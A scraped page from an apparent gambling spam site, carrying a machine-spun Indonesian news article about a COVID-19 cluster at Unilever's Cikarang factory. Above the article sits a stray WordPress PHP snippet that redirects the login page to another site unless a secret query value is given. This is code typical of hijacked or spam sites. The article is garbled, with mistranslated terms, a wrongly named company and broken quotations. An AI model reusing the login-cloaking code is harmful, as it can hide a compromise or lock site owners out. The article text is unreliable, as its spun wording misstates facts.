//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Unilever mengatakan kesehatan dan keselamatan karyawan adalah prioritas utama | adu ayam bali_s128.net login_s128.live

Unilever mengatakan kesehatan dan keselamatan karyawan adalah prioritas utama

BEKASI TRIBUNNEWS.COM-Kerjasama antar pihak sangat penting untuk memutus rantai distribusi Covid-19.

Saat ini, gugus tugas COVID19 Kabupaten Bekasi dan PT Unilever Indonesia Tbk bekerja bersama untuk mengimplementasikan langkah-langkah mitigasi di basis produksi Unilever. Pabrik Cikarang.

Baca: Pabrik Unilever di Cikarang menutup 19 karyawan Covid-19 dan mengkarantina 800 pekerja

Menurut berita yang diterima, Kamis (2020/7/20) PT Unilever China Indonesia Tbk secara aktif mengambil tindakan pencegahan dan keselamatan karyawan Sejak Jumat, 26 Juni 2020, mereka secara aktif menghentikan operasi konstruksi TBB, sebelumnya menerima laporan dari beberapa karyawan departemen teknik konstruksi TBB. Laporan ini dikonfirmasi positif untuk COVID-19. — PT Unilever Indonesia Tbk telah segera menghubungi Biro Kesehatan Daerah Bekasi dan mengirim laporan resmi tentang situasi tersebut, melakukan pelacakan kontak dan meminta agar semua bangunan BB dapat menampung hingga 265 orang.

Pabrik Unilever Cikarang terletak di lokasi yang berbeda .

Gedung TBB adalah bagian dari kompleks pabrik PT Unilever Indonesia Tbk di Cikarang. Beberapa bangunan di kompleks ini dipisahkan secara ketat oleh area kerja dan produksi Perjanjian.

Karyawan hanya dapat bekerja di area masing-masing, dan tidak dapat melewati area kerja dan produksi dengan alasan apa pun.

Juru bicara tim Alamsyah, Dr. M. Kes secara khusus menekankan untuk mempercepat pengembangan area Covid-19 Bekasi. Pentingnya kerja sama yang baik antara kedua pihak dan langkah-langkah yang diambil. Bekerja sama dengan manajemen lokal. “” Kami berterima kasih kepada Unilever Indonesia atas tindakan yang dilaporkan kepada kelompok kerja sehingga kami dapat dengan mudah melakukan inspeksi. Keterbukaan dan kecepatan pemrosesan adalah faktor penting dalam bekerja bersama untuk mengurangi dampak dan mengambil tindakan sehingga kita dapat memutus penyebaran. Menurut ulasan kami, Unilever memiliki beberapa pabrik di gedung Cikarang, dan setiap bangunan memiliki perjanjian ketat untuk membedakan antara pekerjaan dan area produksi. Karena itu, hanya satu area yang dapat ditutup sementara. Kami menghargai bahwa perusahaan telah mengembangkan perjanjian kesehatan masyarakat yang proaktif dan terus berkoordinasi dengan kami, “katanya.

Leave a comment

adu ayam bali_s128.net login_s128.live